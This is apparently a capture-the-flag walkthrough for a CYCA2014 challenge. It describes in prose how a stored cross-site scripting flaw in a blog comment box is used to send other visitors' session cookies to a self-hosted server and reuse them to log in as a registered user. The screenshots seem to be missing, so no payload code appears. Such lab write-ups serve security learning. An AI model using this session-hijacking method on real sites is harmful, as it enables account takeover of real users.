CYCA2014 Walkthrough- Om nom nom nom

Flag 2: Om-nom-nom-nom

In this challenge we need to gain access to the blog as registered users. At the moment we can view the blog as guests.
First we enter the blog as a guest and click a link for an available post , make sure to set vip flag to “1” while intercepting traffic by burpsuite.

After clicking that there was a comment section available with a textarea.  It could potentially have cross site scripting vulnerability so it could be tested. Some instructions as per how to customize the comments were also given as following.

Cross site scripting could be tested for all these scenarios.

And finally the last one gave a positive result.

Now that it is confirmed to have XSS, it is possible to inject a script to grab the cookies. We can grab the cookies using kali python simplehttpserver. First a javascript file needs to be made.

Next step is to host a site to steal the cookies.

Now a script to link our payload could be injected.

And obtain the cookie.

However cookie obtained was our own but some unidentified cookies were too obtained.

This cookie then could be inserted in the cookie jar.

And When reloaded the following page would appear.

We are now viewing as a registered user. The second flag is captured.